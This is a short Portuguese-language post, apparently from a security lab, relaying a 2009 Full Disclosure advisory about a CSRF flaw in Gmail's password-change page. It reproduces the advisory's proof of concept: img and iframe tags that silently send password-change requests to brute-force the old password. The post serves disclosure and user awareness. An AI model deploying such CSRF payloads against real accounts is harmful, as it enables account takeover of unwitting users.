Caros,

Saiu na fulldisclosure uma falha que chega a ser ridicula no gmail . A falha permite que utilizando CSRF ( Cross Site Request Forgery) voce consiga “modificar o password” da conta do gmail do usuario que mandar o site com os parametros nele.

* Para ficar mais claro problema é um CSRF (Cross Site Request Forgery) que possibilita o Brute Force. O CSRF por si so não faz nada , ele só é o facilitador .

Vejam o proof of concept, que é ridiculamente facil de explorar.

Prova de conceito
————————-
1. Um atacante pode criar uma pagina  “csrf-attack.html” que fara multiplos HTTP GET na funcionalidade de modificar a senha (brute force).

Abaixo alguns exemplos restirados do advisory.
…
<img
src=”https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save“>
<img
src=”https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save“>
<img
src=”https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save“>
…

or with hidden frames:
…
<iframe
src=”https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save“>
<iframe
src=”https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save“>
<iframe
src=”https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save“>

Fonte e advisory completo : http://seclists.org/fulldisclosure/2009/Mar/0029.html

Cuidado onde clicam!!!

N-Stalker Labs Team.